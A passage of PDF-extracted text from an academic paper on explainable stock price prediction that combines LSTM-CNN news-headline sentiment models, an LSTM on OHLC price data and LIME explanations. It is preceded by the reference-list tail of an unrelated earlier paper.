https://archive.ics.uci.edu/ml/datasets/MONK’s+Problems. Thrun SB, Bala J, Bloedorn E, Bratko I, Cestnik B, Cheng J, De Jong K, Dzeroski S, Fahlman SE, Fisher D, Hamann R, Kaufman K, Keller S, Kononenko I, Kreuziger J, Michalski RS, Mitchell T, Pachowicz PmReich Y, Vafaie H, Van de Welde W, Wenzel W, Wnek J, Zhang J. 1991. The MONK’s problems: performance comparison of different learning algorithms. Technical Report CS-CMU-91-197. Carnegie Mellon University, Pittsburgh. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 31/32 https://peerj.com http://in.mathworks.com/help/fuzzy/foundations-of-fuzzy-logic.html http://in.mathworks.com/help/fuzzy/foundations-of-fuzzy-logic.html http://dx.doi.org/10.1348/135532502168360 http://dx.doi.org/10.1002/widm.6 https://archive.ics.uci.edu/ml/datasets/Balloons http://dx.doi.org/10.1109/91.273127 http://www.lectlaw.com/files/int20.htm http://www.lectlaw.com/files/int20.htm https://archive.ics.uci.edu/ml/datasets/MONK's+Problems http://dx.doi.org/10.7717/peerj-cs.65 Witten IH, Frank E, Trigg L, Hall M, Holmes G, Cunningham SJ. 1999. Weka: practical machine learning tools and techniques with Java implementations. Available at http://www.cs.waikato.ac.nz/~ml/publications/1999/99IHW-EF-LT-MH-GH-SJC- Tools-Java.pdf (accessed 4 June 2016). Wolpert DH. 1996. The lack of a priori distinctions between learning algorithms. Neural Computation 8:1341–1390 DOI 10.1162/neco.1996.8.7.1341. Wu D, Mendel JM. 2007. Aggregation using the linguistic weighted average and interval type-2 fuzzy sets. IEEE Transactions on Fuzzy Systems 15(6):1145–1161 DOI 10.1109/TFUZZ.2007.896325. Yi X, Rao FY, Bertino E, Bouguettaya A. 2015. Privacy preserving association rule min- ing in cloud computing. In: Proceedings of the 10th ACM symposium on information, computer and communications security. New York: ACM, 439–450. Zadeh LA. 1997. Toward a theory of fuzzy information granulation and its centrality in human reasoning and fuzzy logic. Fuzzy Sets and Systems 90:117–117. Chamikara et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.65 32/32 https://peerj.com http://www.cs.waikato.ac.nz/~ml/publications/1999/99IHW-EF-LT-MH-GH-SJC-Tools-Java.pdf http://www.cs.waikato.ac.nz/~ml/publications/1999/99IHW-EF-LT-MH-GH-SJC-Tools-Java.pdf http://dx.doi.org/10.1162/neco.1996.8.7.1341 http://dx.doi.org/10.1109/TFUZZ.2007.896325 http://dx.doi.org/10.1109/TFUZZ.2007.896325 http://dx.doi.org/10.7717/peerj-cs.65 work_3r5hnn4c4fhgvg2epficptavh4 ---- Submitted 19 August 2020 Accepted 28 November 2020 Published 28 January 2021 Corresponding authors Hrituja Khatavkar, hrituja.khatavkar@sitpune.edu.in Ketan Kotecha, head@scaai.siu.edu.in Academic editor Rajanikanth Aluvalu Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.340 Copyright 2021 Gite et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Explainable stock prices prediction from financial news articles using sentiment analysis Shilpa Gite1, Hrituja Khatavkar1, Ketan Kotecha2, Shilpi Srivastava1, Priyam Maheshwari1 and Neerav Pandey1 1 Symbiosis Institute of Technology, Symbiosis International (Deemed University), Pune, Maharashtra, India 2 Symbiosis Center for Applied Artificial Intelligence (SCAAI), Symbiosis International (Deemed University), Pune, Maharashtra, India ABSTRACT The stock market is very complex and volatile. It is impacted by positive and negative sentiments which are based on media releases. The scope of the stock price analysis relies upon ability to recognise the stock movements. It is based on technical fundamentals and understanding the hidden trends which the market follows. Stock price prediction has consistently been an extremely dynamic field of exploration and research work. However, arriving at the ideal degree of precision is still an enticing challenge. In this paper, we are proposing a combined effort of using efficient machine learning techniques coupled with a deep learning technique—Long Short Term Memory (LSTM)—to use them to predict the stock prices with a high level of accuracy. Sentiments derived by users from news headlines have a tremendous effect on the buying and selling patterns of the traders as they easily get influenced by what they read. Hence, fusing one more dimension of sentiments along with technical analysis should improve the prediction accuracy. LSTM networks have proved to be a very useful tool to learn and predict temporal data having long term dependencies. In our work, the LSTM model uses historical stock data along with sentiments from news items to create a better predictive model. Subjects Artificial Intelligence, Data Mining and Machine Learning Keywords Long Short-Term Memory (LSTM), Explainable AI(XAI), Stock price prediction, Deep Learning INTRODUCTION Stock market investment/trading can be very tricky and stressful but rewarding if predicted correctly. It has been an object of study for the past many decades and is a complex task because of the large number of parameters, disordered information, and dynamism. Several technical indicators and sources of information affect the stock prices, but due to the substantial amount of data present, it becomes difficult to predict the prices. However, with the advancement in technology, particularly in processing large chunks of temporal data, the field is continuously improving to achieve better prediction accuracy. There is a famous hypothesis in finance called the Efficient Market Hypothesis, which states that asset prices cannot entirely depend on obsolete information and market prices react to new information, for example, financial news articles, social media blogs, etc (Ţiţan, How to cite this article Gite S, Khatavkar H, Kotecha K, Srivastava S, Maheshwari P, Pandey N. 2021. Explainable stock prices prediction from financial news articles using sentiment analysis. PeerJ Comput. Sci. 7:e340 http://doi.org/10.7717/peerj-cs.340 https://peerj.com/computer-science mailto:hrituja.khatavkar@sitpune.edu.in mailto:head@scaai.siu.edu.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.340 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.340 2015). These sources change the sentiments of the investor and the traders. With the advancement in Artificial Intelligence, information coming from both financial time series, which captures sentiments and other technical analysis data, can be fused to predict stock prices. In this paper, we suggest a technique involving LSTM and the interpretability power of Explainable AI (XAI) for visual representations to provide a definite outline that helps them anticipate their future stock prices. The data we are using is the National Stock Exchange (NSE) and the news headlines aggregated from Pulse (Pulse by Zerodha, 2020 ). Pulse has aggregated 210,000+ Indian finance news headlines from various news websites like Business Standard, The Hindu Business, Reuter, and many other news websites. STATE-OF-THE-ART TECHNIQUES Cho et al. (2014) proved that the Recurrent Neural Network (RNN) is a powerful model for processing context information from textual data. However, to tackle long-term dependencies, the variant of RNN, LSTM, has proved to be very effective in handling complex tasks for text processing and language modeling on temporal data (Sherstinsky, 2020). We propose using LSTM for news classification for sentiments, employing the interactions of words during the compositional process. LSTM incorporates a memory cell, which is a unit of computation that supersedes the traditional deep learning neurons in the network (Moghar & Hamiche, 2020; Egeli, Ozturan & Badur, 2003). To understand the behavior of the proposed model, we also intend to make our model explainable. XAI aims to develop a collection of machine learning techniques that produce more explainable models (Doran, Schulz & Besold, 2017). Using XAI techniques, we wish to provide knowledge about the prediction made by the model so that the user can get insights for future trading/investment strategies. The model can be interpreted by visual tools, which can help us to consider the biases in the model before making the final decision. Kalyani, Bharathi & Rao (2016) in their research, using supervised machine learning for classification of news headlines and additional text mining techniques to examine news polarity. The news articles with its polarity score and text converted to tf-idf vector space are fed to the classifier. Three different classification algorithms (Support Vector Machines ‘‘SVM’’, Naïve Bayes and Random Forest) are implemented to investigate and enhance classification accuracy. Results of all three algorithms are compared based on precision, recall, accuracy, and other model evaluation techniques. When evaluating the results of all classifiers, the SVM classifier performs satisfactorily for unknown data. The Random Forest also showed better results when compared to the Naïve Bayes algorithm. Finally, the relationship between news articles and stock price data are plotted. Nayak, Pai & Pai (2016) used the historical data from 2003 obtained from Yahoo Finance and used two models to predict the stock trend. One model was built for the prediction of daily stock by considering all the data available daily. The second model that was built was for monthly prediction of stocks, and it considered data available every month. Also, two different datasets were used for each model. A historical price dataset was used for the Daily Prediction model and historical data from 2003 obtained from Yahoo finance is Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340 used for a monthly prediction model. The dataset was modeled using various models like boosted decision tree, logistic regression, and support vector machine. Up to 70% accuracy was observed using the Support Vector Machine. Vargas, Lima & Evsuko (2017) proposed a Recurrent Convolutional Neural network model. It predicts intraday movements of the S&P 500 record. The model data sources financial news headlines from the day past of the forecast day and utilizes a few specialized indicators which are extracted from the primary target. Every news is processed through a two-step procedure—initially, a word2vec model to create a vector to display each word, and afterward they implement the mean (average) of all the word vectors of the same title. The RCNN model uses deep learning models: CNN and RNN. The CNN model is utilized to separate rule base data from the text while the RNN-LSTM model is utilized to get the context information and to interpret the stock information attributes for forecast purposes. Yoo, Kim & Jan (2005) analyzed and assessed a portion of the current ML techniques for stock exchange prediction. After comparing various models like multivariate regression, Neural Networks, Support Vector Machines, and Case-Based Reasoning models, they inferred that Neural Networks offer the capacity to predict market trends accurately when contrasted with different procedures. SVMs and Case-Based Reasoning are famous for predicting stock costs due to their simplicity of use and implementation. LSTM LSTM (Long Short-Term Memory) is an improved form of RNN. LSTM models avoid the problems encountered by RNN. Hochreiter & Schmidhuber (1997) introduced LSTMs that make use of memory cells that can either forget unnecessary information or store information for more extended periods. LSTMs are explicitly modeled to handle tasks involving historical texts and are also able to educate themselves on long term dependencies. With the help of memory cells, they are capable of educating themselves. LSTMs have a chain-like structure making it easier to pass on information. The information is passed on as a state of the cell from one memory cell to another. The output of the network is modified by the state of these cells. The architecture of LSTM allows for constant error flow with the help of constant, self-connected units (Hochreiter & Schmidhuber, 1997). This flow of error and states is propagated with the help of the three gates: input gate, output gate and forget gate, that each LSTM memory cell block is composed of. Input gates modulate the amount of new information received by a cell, forget gates determine what amount of information from the previous cell is passed on to the current cell; they determine what information is relevant and what information needs to be forgotten (Kim & Won, 2018). Given below in Fig. 1A is the structure of Simple Recurrent Network (SRN). As compared to SRN, LSTM-Cell given in Fig. 1B is different and has multiple gates. LSTM model has two passes: • Forward Pass, and • Backward Pass Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340 Figure 1 Detailed schematic of the Simple Recurrent Network (SRN) unit (A) and a Long Short-Term Memory block (B) as used in the hidden layers of a recurrent neural network. Full-size DOI: 10.7717/peerjcs.340/fig-1 Forward Propagation In neural networks, the storage and calculation of intermediate results in the sequence from the input layer to the output layer are called Forward Propagation. In this propagation, we work incrementally through the mechanics of a deep network with one hidden layer. It consists of the processing of weighted inputs through the activation function. Forward propagation is done to get a value. We then compare this computed value with the real value to further compute the error. Then, in backward propagation, we calculate the derivative of the error with respect to the weights. Then we subtract the value obtained from the value of the weight. The final step in a forward pass (Vargas, Lima & Evsuko, 2017) is to the comparison between the predicted and the expected output. Forward propagation is calculated using the following steps: Z[i]=w[i]a[i−1]+b[i−1] (1.1) g[i](Z)=σ(Z[i]). (1.2) Backpropagation Backpropagation (Vargas, Lima & Evsuko, 2017) is analogous to calculating the delta rule for a multilayer feedforward network. Backpropagation is the method to calculate the gradient of neural network parameters. The main aim of backpropagation is to minimize the cost function by weights and biases of the network. The amount of adjustment to be made is determined by the gradients of the cost function for the respective parameters. Assuming we have the following functions: Q= f (P) (1.3) R=g(Q) (1.4) g(Q)=g◦f (P). (1.5) Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 4/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-1 http://dx.doi.org/10.7717/peerj-cs.340 Where, the input and the output P, Q, R are tensors of arbitrary shapes. By using the chain rule, we can compute the derivative of R wrt P: dR/dP=dot(dR/dQ,dQ/dP). (1.6) A Forward Pass Let xt be the input for time t, N be the quantity of LSTM blocks, M is the number of inputs. We then get the subsequent weights for LSTM layer: •Input weights: Wz, Wi , Wf , Wo ∈ RN×M •Recurrent weights: Rz, Ri , Rf , Ro ∈ RN×N •Peephole weights: pi , pf , po ∈ RN •Bias weights: bz, bi , bf , bo ∈ RN Then the vector formulas for a vanilla LSTM layer forward pass can be written as: zt=Wzx t +Rzy t−1 +bz (1.7) zt=g(zt) block input (1.8) it=Wix t +Riy t−1 +pi�c t−1 +bi (1.9) it=σ(it) input gate (1.10) f t=Wfx t +Rfy t−1 +pf�c t−1 +bf (1.11) f t=σ(f t) forget gate (1.12) f t=Wfx t +Rfy t−1 +pf�c t−1 +bf cell (1.13) ft=σ(f t) (1.14) ct=zt�it+ct−1�ft (1.15) ot=Wox t +Roy t−1 +po�c t +bo (1.16) ot=σ(ot) (1.17) yt=h(ct)�ot Output gate (1.18) where σ , g and h are pointwise non-linear activation functions. The logistic sigmoid (σ(x)=1/1+e −x) is employed as an activation function and also the tangent hyperbole (g(x) = h(x) = tanh(x)) is typically used because the block input and output activation function. Pointwise multiplication of 2 vectors is denoted by � (Greff et al., 2015) . B. Backpropagation Calculation of deltas in LSTM Block: δyt=1t+RTz δ t+1 z +R T i δ t+1 i +R T f δ t+1 f +R T oδ t+1 o (1.19) δot=δyt�h(ct)σ ′(ot) (1.20) δct=δyt�ot�h′(ct)+po�δo t +pi�δi t+1 +pf�δf t+1 +δct+1�ft+1. (1.21) Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 5/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340 Here, 1t is the vector of deltas delegated from the layer above. If E is the loss function, it corresponds to ∂E ∂yt , but not counting the recurrent dependencies (Pathmind, Inc., 2020). Then: δf t=δct�ct−1�σ ′(f t) (1.22) Why LSTM? LSTM networks various state cells. These short and long-term memory cells rely on the state of these cells. These memory cells act as an aide for the model to remember historical context as predictions made by the network are influenced by past experiences of inputs to the network. This helps us make better predictions. LSTM networks tend to keep the context of information fed by inputs by integrating a loop that allows information to flow, in one direction i.e from one step to the following. Explainable AI (XAI) We want our model to output not only the prediction part but also the explanation as to why the prediction turned out that way. If our machine makes a prediction, why should the user trust the prediction made by the machine? Today, machine learning and Artificial Intelligence(AI) are exploited to make decisions in many fields like medical, finance, and sports. There are cases where machines aren’t 100% accurate. So, the user should blindly trust the choice of the machine? How can the user trust AI systems that derive inferences on probable unfair grounds? To solve the problem of trust between the user and Artificial Intelligence, XAI (Saffar, 2019) can be employed. It gives us the reasoning for a prediction made by the model. Mainly XAI is employed to resolve the black box problem. This ’’black box’’ phase is interpreted by XAI and explained to the users. The user cannot completely depend on the model without a clear understanding of the model and the way the output is achieved. XAI provides a clear understanding of how the model achieved a certain prediction or result. XAI gives a human-understandable explanation for the prediction. Current models enable interpretation but leave it to the user to apply their knowledge, bias and understanding. METHODOLOGY Given below is a systematic representation of how the data served to the system, how the model is trained and tested. And how XAI works to interpret the model. System design Figure 2 explains the overall architecture of the system. We preprocess the News Headlines Dataset by performing tokenization, removing stop words, and embedding it. The headlines are then normalized and sentiment analysis is performed on it to comprehend the sentiment behind each sentiment, i.e whether a particular headline has a positive or negative sentiment associated with it. We then use the preprocessed headlines to classify them. We classify them to analyze whether they produce a positive sentiment or a negative sentiment. Later, this headline dataset, along with the preprocessed Yahoo Finance dataset, is combined to Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 6/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340 Figure 2 System Architecture of Stock Market Prediction using LSTM and XAI. Shows how the data is initially processed, divided into train and test set to build further predictions and evaluate the biases using XAI. Full-size DOI: 10.7717/peerjcs.340/fig-2 form the final dataset. Then the dataset is divided into train and test dataset. The training dataset is used to build the LSTM model. The test dataset to verify the results obtained after training. Finally, XAI is implemented using the LIME tool that is used to interpret the model and understand the biases involved in the dataset. Algorithm The algorithm is divided into prediction of the opening price using LSTM-CNN and XAI for interpreting the model. Given below is the algorithm. Prediction Input: processed news headlines Instantiate ReduceLRPlateau() Instantiate ModelCheckpoint() Instantiate EarlyStopping() Truncate and pad input sequence while epoch r: 1 ->R For batch_size b: 1->B Design the model by adding: Sequential layer to LSTM model embedding Layer Conv1D() and MaxPooling1D LSTM() Dense layer Fit the model Evaluate the model Save the model Use XAI to interpret the model Output: Table with Predicted opening values Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 7/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-2 http://dx.doi.org/10.7717/peerj-cs.340 XAI Input: Processed headlines Instantiate LimeTextExplainer() Instantiate explain_instance() with appropriate hyperparam- eters(text, pipeline.predict_proba, number of features) Create an ordered dictionary of words and weights Plot a bar-plot with appropriate axes Output: Plot of biases of words (weights) vs words Procedure Selecting the prediction model Based on the evaluation done by Ghosh et al. (2019) comparing the various models, including simple linear regression such as ARIMA, AR, ARMA, or nonlinear models such as ANN, ARCH, RNN, LSTM it was concluded that LSTM could achieve higher accuracy as compared to other models. Stock market prediction requires a nonlinear dynamic system; LSTM can train themselves with nonlinear input–output pairs. Moreover, combining qualitative factors like international events, financial news, News headlines’ sentiments, etc. can achieve much higher accuracy. Selecting datasets A dataset of financial news headlines is obtained from Pulse. Pulse is a news aggregator and it aggregates Financial news from various sources thus providing less biased dataset. This dataset is combined with a Yahoo Finance dataset (Yahoo Finance, 2020). Since our main focus was on Indian Stock Market prices (Hiransha et al., 2018), we extracted news headlines from the dataset accordingly. Moreover, an indication of changes in the stocks (Zhang, Fuehres & Gloor, 2011) for BSE and NSE was included. The values represented the stock market prices of the day the news headline was published and of the day after. The dataset was split into 80% for training, 10% for validation, and 10% for testing. The dataset used in this project has 19,736 data entries and has 3 parameters: New Headlines, Website and the Timestamp. Data preprocessing The data obtained is raw and unprocessed. To perform any computation, processing the data is necessary. For instance, the null data should be removed, and the trivial values should be removed, etc. Given below in the Fig. 3 is the raw dataset obtained from the sources. This is what the Financial News dataset looked like before preprocessing. Table 1 shows the features neccessary for our model and we clean the dataset to obtain only these features. Steps involved in Data Preprocessing are represented in Fig. 4: As we are first training the LSTM model only for BSE-SENSEX and NSE-NIFTY, we train it on news headlines involving SENSEX and NIFTY specific news only. For this, we search for headlines that contain the word: ‘‘Sensex’’ (case - independent). Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340 Figure 3 Dataset before cleaning. The data collected through various sources consists of unwanted and redundant values that need to be processed. Full-size DOI: 10.7717/peerjcs.340/fig-3 Table 1 Features of Clean data. Final columns that are used in the dataset that is necessary for the model building and model evaluation. Column A Column B Column C News headline Website Timestamp Figure 4 Steps in data preprocessing. (A) Dropping: to include only the necessary data, unwanted columns/rows must be dropped; (B) Tokenization helps in increasing the speed of computation and efficiency; (C) cleaning is required after tokenization since some words are not necessary for the evaluation; (D) normalizing: by bringing all values in one range, it is easier to compare various values and evaluate the model. Full-size DOI: 10.7717/peerjcs.340/fig-4 After running the code on our cleaned dataset we get this result as shown in Fig. 5. Sentiment analysis for stock market news headlines To be able to predict the stock market (Patel et al., 2014), we must understand the market’s sentiment correctly. Negative news will lead to a fall in the price of the stock and positive news will lead to rising in the price of the stock. The most commonly used words in a news headline will give rise to an instant trigger of emotions in a particular person’s mind. Hence we made a word cloud of the top 150 words commonly occurring in a news headline from our dataset as depicted below in Fig. 6. Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 9/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-3 https://doi.org/10.7717/peerjcs.340/fig-4 http://dx.doi.org/10.7717/peerj-cs.340 Figure 5 Dataset after cleaning. Clean dataset, after preprocessing helps in an efficient model building and model evaluation. Full-size DOI: 10.7717/peerjcs.340/fig-5 Figure 6 Top 150 commonly used words in a news headline by using WordCloud. The WordCloud generated from the data gives the overview of which words in the headline impact stocks. Full-size DOI: 10.7717/peerjcs.340/fig-6 LSTM network is a type of RNN that preserves its state. (Olah, 2020) LSTM (Selvin et al., 2017) has already provided satisfactory results in the area of text data applications such as machine translation and NLP (Bird, Klein & Loper, 2016). The headlines are a type of text data; for that reason, it was a rational decision to apply this type of network to our data. Figure 7 shows the LSTM network architecture used in our project. Input News features from different online news sites have been scraped and used as input for our application. Then the headlines are cleaned, and the remaining characters are converted to lowercase to overcome identical double words with different capitalization. Word embedding is dealt with by changing over the words to their proper index using the top 2000 words in the corpus; the rest of the words that are not found in the top 2000 words corpus are set to zero. The maximum size of the word embeddings is 100 and zero-padded for smaller headlines. Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 10/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-5 https://doi.org/10.7717/peerjcs.340/fig-6 http://dx.doi.org/10.7717/peerj-cs.340 Figure 7 Network Architecture of LSTM Network. The network architecture of the LSTM network de- picts how the processed headlines are embedded and passed through a CNN Layer and further through an LSTM cell to output the prediction. Full-size DOI: 10.7717/peerjcs.340/fig-7 LSTM - CNN model for news headlines 1. Initially, we have created an instance of ReduceLROnPlateau, which reduces the learning rate when a metric has stopped improving accuracy. 2. Secondly, we have a ModelCheckpoint callback. It is used for training the model using model.fit() to save a model or weights at some interval, which can be loaded later to continue the training from the state saved. 3. An instance of EarlyStopping is created. This stops training the model when a particular metric has stopped improving. Then the preprocessed data is loaded and only the top n words are kept, and the rest are zero. Also, split it into the train dataset and test dataset. The data is then truncated and we pad the input sequence (X_train and X_test). A split of 70-30 is done for the train and test. 4. Finally, we create a model. (a) The first layer is constructed using the sequential network model of the Keras framework. A Sequential model works good enough for vanilla stack layers. Each layer has one input tensor and one output tensor exactly. (b) The next layer, i.e., an Embedding layer, is added. Here, the text data is encoded first. In an embedding, words are defined by dense vectors. Each vector serves the projection of the word into a continuous vector space. (c) Then a MaxPooling1D layer is added. A pooling layer is an elementary constituent unit of CNN. The main function of the pooling layer is to sequentially minimize the spatial orientation size and the number of parameters and hence reduce the computation required over the network. The pooling layer operates separately for each feature map. Out of all the pooling layers, the one best suited for our model was max pooling. It is depicted as follows: It takes the maximum value over the window defined by pool_size and hence downsamples the input representation. In our model, the pool_size is 2. Figure 8 visualises the working of CNN MaxPooling1D. Next, we then construct an LSTM layer of 100 units, as our inputs’ maximum review length is 100. We then add a Dense layer having the activation function of sigmoid as this is our final layer. We also are using an adam optimizer with a learning rate of 1e−3. The Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 11/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-7 http://dx.doi.org/10.7717/peerj-cs.340 Figure 8 CNN MaxPooling1D. The MaxPooliing1D layer minimizes the spatial orientation size. The layer works separately on each feature. Full-size DOI: 10.7717/peerjcs.340/fig-8 model is finally compiled and then we save the model. We then print the model summary and the function is called for today and tomorrow parameters. LSTM model for OHLC dataset The OHLC dataset consists of Open, High, Low and Close stock prices of a particular company for each period. For this model, we have initially loaded the dataset and split it into test and train data. This dataset does not require much preprocessing as the data and operation over it is very straightforward. Once data is loaded we use MinMaxScaler() which transforms features by scaling each feature to a given range. The fit_transform method is applied to the instance scl of MinMaxScaler() to tokenize the text and output, each dimension corresponding to the frequency of token found in the text. The data is split into input ‘X’ and output ‘y’. It is collected by splitting ‘i’ past days as input X and ‘j" coming days as Y. The fit_transform method is applied to the instance scl of MinMaxScaler() to tokenize the text and output. Then we build the model with the first layer constructed using the Sequential model and the next 2 hidden layers using LSTM Finally, a Dense() layer is used for constructing the output. Hyperparameters, loss function and optimizer A hyperparameter is a configuration whose value cannot be determined by the dataset. It needs trial experiments where one can manually test which hyperparameter suits best for the model.Once fine-tuned the model is trained better. Optimizers are algorithms for altering the attributes as weights and learning rate in order to reduce the loss. Table 2 represents the hyperparameters and their values used in the experiment. LIME As represented in Fig. 9, after training the model and obtaining predictions the explainer interpretes the model so that the user can make appropriate judgements. After studying various XAI (Khaleghi, 2019; Ribeiro, Singh & Guestrin, 2016) tools like LIME, What- If (Wexler et al., 2019), DeepLift (Shrikumar et al., 2016), Shapely (Messalas, Christos & Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 12/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-8 http://dx.doi.org/10.7717/peerj-cs.340 Table 2 Hyperparameters, loss function and optimizer and their values used along with detailed com- ments. Title Value Comments Loss function Binary cross-entropy Since the type of classification performed is binary Optimizer Adam optimization Used to enhance the network Learning rate 0.001 Set after trials Decay 0.1 Validation loss does not ameliorate significantly any more for 5 epochs, there will be decay. Figure 9 Working of XAI. The mode generates the prediction, which along with the data, is run through the XAI tool. The XAI tool explains the data based on the biases to facilitate better decision making. Full-size DOI: 10.7717/peerjcs.340/fig-9 Yannis, 2019), we realized the one which will determine the Transparency of our model in the best possible way was LIME. According to the study, the What-if Tool is an interactive visual tool to help the user comprehend the datasets and better understand the output of TensorFlow models. To analyze the models deployed. However, it is well suited for XGBoost and SciKit Learn Models. DeepLift is a tool that collates the activation of a neuron to its ’reference points’ and assigns contribution scores accordingly. A single backward pass is used to compute scores efficiently. DeepLift reveals dependencies that are otherwise missed by other methods giving separate consideration for positive and negative contributions. LIME, short for Local Interpretable Model-Agnostic Explanations (Ribeiro, Singh & Guestrin, 2016), is a tool that is used to explain what the machine learning model is performing. It is applied to the models which perform behaviour but we do not know how it works. Machine learning models (Patel et al., 2015) can be explained using plots, for example, linear regression, decision trees; these are some of the classifiers that can be explained using plots (It can only give an explanation for the global, but it cannot give an explanation of any local observation). But there are some significant data with more complexities and more dimensions that cannot be explained using plots. One of the examples is the neural network; it cannot be explained using plots. Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 13/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-9 http://dx.doi.org/10.7717/peerj-cs.340 By using LIME, we can understand what the model does, which features it picks on to create or develop prediction. LIME is model-agnostic; it means that it can be used for any black-box model that we know today or can be developed in the future. LIME tool is local; it means it is observation specific; it explains every single observation that you have in a dataset. If a model has a high accuracy, can we trust the model without having interpretability? The answer is no; we cannot trust it because many models have noises that can predict the output right, but the way the model has predicted will contain some faults which are not good for a long term process. So, interpretability is important for building trust with the model. Performance measure Validation loss For neural networks we consider the loss to be negative log-likelihood for classification and residual sum of squares for regression. Hence the primary aim of our learning model is to decrease the value of the loss function as we tune its parameters by changing weights through different optimization methods. The value of loss suggests how well a certain model runs for each optimization iteration. Preferably, after each iteration, we would expect a decrease in the value of the loss. Some points should be kept in mind while we observe the decrease in loss value. For example, one may face the problem of overfitting wherein the model memorizes the training dataset examples and becomes less effective for the test dataset. Over-fitting also occurs when you do not employ a regularization or normalization. We may have a very intricate model, or the number of data points N is very low. Validation accuracy We calculate the accuracy of a model once the model is completely trained. This means that the parameters are fixed, and no further model learning will be taking place. Then the test dataset is then inputted into the model, and the number of errors the model makes is reestablished after comparing it with the target values. Finally, the percentage of misclassified data is calculated. Let us understand this with an example. The model’s accuracy is 96.2% means that out of 1,000 test samples, the model classifies 962 of samples correctly. RESULTS AND DISCUSSION Result Table 3 represents the results generated after performing the experiments. In LSTM-CNN the input was the data that we get from preprocessing. The data was then combined with a dataset of the news headlines and the prices. The model which we trained was of the news headlines of Sensex. There are a total of 100 epochs to be run in the training of the model. But it stops at the 15th epoch; this is due to avoiding making the model overfitting. The accuracy of the model in a total of 15 epochs is 74.76%. The Loss was 0.1693. As we see in Fig. 10: Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 14/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340 Table 3 Result generated. The LSTM-CNN model results using the New Headlines dataset and its com- parison with the result generated by the LSTM model using the OHLC dataset. The result depicts the ac- curacy and loss of the two models. Model Dataset No of Epochs Accuracy Loss LSTM-CNN News Headlines 15 74.76% 0.1693 LSTM OHLC 10 88.73% 0.1733 Figure 10 Loss LSTM -CNN model for News Headlines. The loss values for the LSTM-CNN model showing that the model was processed till Epoch No. 16, and there was an Early Stopping to avoid overfitting. Full-size DOI: 10.7717/peerjcs.340/fig-10 Epoch 00015:val_acc did not improve from 0.73876. There are a total of 100 epochs. They stopped training at 15 to 18th epochs. This is because of the function EarlyStopping that helps to avoid the problem of overfitting. The accuracy remains constant after the 15th epochs, whereas, val_acc starts decreasing due to which training stops. val_acc:- It is the measure of how good are the predictions of the model. So, in our case, the model is very well trained till the 15th epoch, and after that, the training is not necessary. acc:- It gives the percentage of instances that are correctly classified. In our case, the percentage is 93.15%. val_loss:- val_loss is the loss that is applied to the testing set, whereas, the loss is applied to the training set. val_loss is the best to depend on to avoid the problem of overfitting. Overfitting is when the model is fit too closely to the training data. The val_loss and loss keep on decreasing, whereas acc and val_acc are kept on increasing this shows that our model is well-trained. Figure 11 visualises the loss over number of epochs. As according to the plot obtained after training, we observe that initially, the loss is very high; however the validation loss is low relatively. Once the epochs progress, the loss decreases, thus providing better learning for our model. The point where the loss and validation loss plateaus are the point where no further learning might be possible with the same amount of data for the same number of epochs. Although the accuracy of LSTM-CNN with news headlines data is less than LSTM with OHLC data, since we are interpreting the model, it is adding another perspective of viewing at the model, which makes it a better model. When compared with RNN-CNN (Tan et al., 2019; Zhang, Chen & Huang, Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 15/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-10 http://dx.doi.org/10.7717/peerj-cs.340 Figure 11 Loss for LSTM for OHLC Data. Graph comparing the loss vs. val_loss for the OHLC dataset for the LSTM model shows as the number of epochs progresses, the values of loss and val_loss tend to de- crease and plateau to approximately 0.0010. Full-size DOI: 10.7717/peerjcs.340/fig-11 Figure 12 Sample 1,000 feature weights given by LIME. Result obtained by LIME tool after modeling it. We get a cumulative 1,000 explanation features. Each word is weighted. Full-size DOI: 10.7717/peerjcs.340/fig-12 2018) model , which it performs way better since not only does it remember small term information but also long term information. Results of XAI As for the first model,as shown in Fig. 12 , we get a cumulative 1,000 explanation features. The word surge is mostly related in a negative context and hence is having a negative weight. Similarly, higher is mostly in those sentences which depict the growth of stocks and hence is having positive weight. We can also observe the word Sensex having near about neutral weight as it has both positive and negative references. Thus depicts both falls as Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 16/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-11 https://doi.org/10.7717/peerjcs.340/fig-12 